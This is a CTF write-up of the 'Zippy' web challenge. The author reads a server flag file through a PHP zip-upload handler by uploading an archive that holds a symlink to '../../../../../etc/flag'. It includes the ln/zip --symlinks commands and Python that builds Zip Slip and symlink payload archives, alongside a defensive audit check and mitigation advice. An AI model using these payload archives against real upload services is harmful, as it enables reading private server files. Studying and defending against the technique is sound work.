Zippy Challenge writeup CyberHack CTF

Aagam shah
Published in InfoSec Write-ups
Jun 8, 2020


Zippy was one of the challenges in the Web category of the CyberHack CTF. It was an interesting one because we had to abuse the server-side zip handling in a PHP application to get the flag out. It is also close to a real-world scenario, since web applications frequently accept and unpack zip files.

Zippy Challenge

The challenge description asked whether we could break the zip upload function, and a URL was provided. Visiting the URL showed a page like this.

Zippy Login

It asked for a username and password. The solution here is one specific case, but how to approach such challenges is just as important, so I will try to explain my mindset. The first thing to do in a CTF is to check for common files on the web server; sometimes that is an easy win. I first checked for a robots.txt file at this URL.

robots.txt

The file was not present. We still needed to log in so we could upload zip files to test, so the next step was to check the page source.

View page Source

There was a comment saying the credentials were the name of a file, and the only file referenced in the page source was “admin.gif”. So the username and password were both admin.

Upload page.

That logged me in. There was a file upload option and a note saying the flag was in the file /etc/flag, so our goal was to read that file. I quickly zipped a simple PHP shell and uploaded it to this page.

Shell upload

It just echoed back the content of the file inside my uploaded zip; the PHP was not executed. The next thing that came to mind was reading a file through the zip:// stream wrapper, a trick posted a while back by yumi_sec.

Ref: https://twitter.com/yumi_sec/status/1253620834691887105

zip:// stream wrapper trick.

This did not work for this challenge, perhaps because the uploaded archive was not kept on disk at any path we could point zip:// at. What was actually happening was that the zip was unpacked and the file inside it was simply printed (cat) in the response.

After searching for a while I came across an issue called “Zip Slip”, which affects zip extraction code written in many languages. The exploitation works by putting an entry into the archive with a specially crafted name, for example “../etc/passwd”: when the extractor writes that entry it ends up outside the intended directory, which is a path traversal on the server side. You can read more about Zip Slip here.

Next I looked at how to get a file referring to something like “../../etc/flag” into the archive, since reading that file was our goal. One way is a symbolic link: create a symlink pointing at the target path, then add it to the archive with the “--symlinks” (-y) flag of the zip command, so that zip stores the link itself rather than the contents of the file it points to. If the server recreates the link on extraction and then reads it, it reads the target file instead. This is a related but distinct trick from a Zip Slip entry name: here the entry name is harmless and it is the link target that traverses.

First test

Once uploaded, it gave a path error.

Error in path

Here the full path of our uploaded file is displayed together with a “No such file or directory” error. The link was being followed, but the relative target did not reach /etc from the extraction directory, so we needed to traverse further up. The second payload was “../../../../../etc/flag”.

Second payload

Same process: create the symlink, zip it with --symlinks, upload, fingers crossed.

Flag

And it worked: we got the content of the flag file, and with it the flag. This can certainly be a real-world scenario. To prevent it, an extractor has to validate every entry before writing it: reject any name that resolves outside the extraction directory (after normalising “../” sequences and absolute paths) and refuse, or at least never follow, symbolic link entries. Only stripping “special characters” from filenames is not enough, because in the symlink case the entry name itself looked perfectly ordinary.
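To make both halves of this concrete, the payload construction from the symlink steps above and the extraction-time check this paragraph calls for, here is an added Python example; it is not part of the original writeup or of the challenge's code. It builds two archives in memory with the standard library: one whose entry name traverses upward (the Zip Slip shape) and one carrying a symlink entry pointing at ../../../../../etc/flag, which is what `ln -s ../../../../../etc/flag flag && zip --symlinks payload.zip flag` produces. The audit function then applies the check a safe extractor should run. The extraction directory /var/www/uploads and the function names are assumptions for illustration; the challenge's real path was only visible in the error screenshot.

```python
import io
import os
import stat
import zipfile

# Unix mode of a symbolic link (S_IFLNK | 0777). `zip --symlinks` stores this
# in the high 16 bits of the entry's external attributes and stores the link
# target as the entry's data instead of the pointed-to file's contents.
SYMLINK_MODE = stat.S_IFLNK | 0o777


def flag_path(depth: int, path: str = "etc/flag") -> str:
    """Relative path that climbs `depth` directories, then descends to `path`.

    flag_path(5) is the second payload from the writeup.
    """
    return "../" * depth + path


def build_archive_with_entry(entry_name: str, content: bytes = b"owned\n") -> bytes:
    """Archive with one regular file entry. A traversing `entry_name`
    gives the classic Zip Slip shape; a plain name gives a benign upload."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(entry_name, content)  # name is stored exactly as given
    return buf.getvalue()


def build_symlink_archive(link_name: str, target: str) -> bytes:
    """Archive whose single entry is a symlink `link_name -> target`.

    Equivalent to: ln -s <target> <link_name>; zip --symlinks payload.zip <link_name>
    Without --symlinks, zip would follow the link and store the contents of
    the target on the attacker's own machine instead of the link.
    """
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        info = zipfile.ZipInfo(link_name)
        info.create_system = 3                 # 3 = Unix, so extractors honour the mode bits
        info.external_attr = SYMLINK_MODE << 16
        zf.writestr(info, target)              # a symlink entry's data is its target path
    return buf.getvalue()


def escapes_directory(dest: str, entry_name: str) -> bool:
    """True if writing `entry_name` under `dest` would land outside `dest`.

    Resolving the joined path and comparing it with the resolved destination
    catches '../' sequences, absolute names and mixed forms in one check,
    which is more robust than filtering characters out of the name.
    """
    root = os.path.realpath(dest)
    target = os.path.realpath(os.path.join(root, entry_name))
    return os.path.commonpath([root, target]) != root


def audit_archive(data: bytes, dest: str) -> list:
    """Return (entry_name, reason) for every entry a safe extractor must refuse."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            mode = info.external_attr >> 16
            if stat.S_ISLNK(mode):
                # Refuse links outright: even an in-tree link can later be
                # pointed at /etc/flag by a second archive.
                link_target = zf.read(info).decode("utf-8", "replace")
                findings.append((info.filename, "symlink to " + link_target))
                continue
            if escapes_directory(dest, info.filename):
                findings.append((info.filename, "path escapes " + dest))
    return findings


if __name__ == "__main__":
    dest = "/var/www/uploads"  # assumed extraction directory, not the challenge's real path
    payloads = {
        "zip slip entry name": build_archive_with_entry(flag_path(5)),
        "symlink entry": build_symlink_archive("flag", flag_path(5)),
        "benign upload": build_archive_with_entry("shell.php", b"<?php echo 'hi'; ?>"),
    }
    for label, data in payloads.items():
        print(label, "->", audit_archive(data, dest) or "clean")
```

The symlink archive can be written to disk and inspected with `unzip -Z` or `zipinfo`, which list the entry with an `l` type letter and its target, the same view the server's extractor had of the challenge payload.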

Thanks to the CyberHack CTF team for setting this up!

Have a good one !! Happy hacking !!
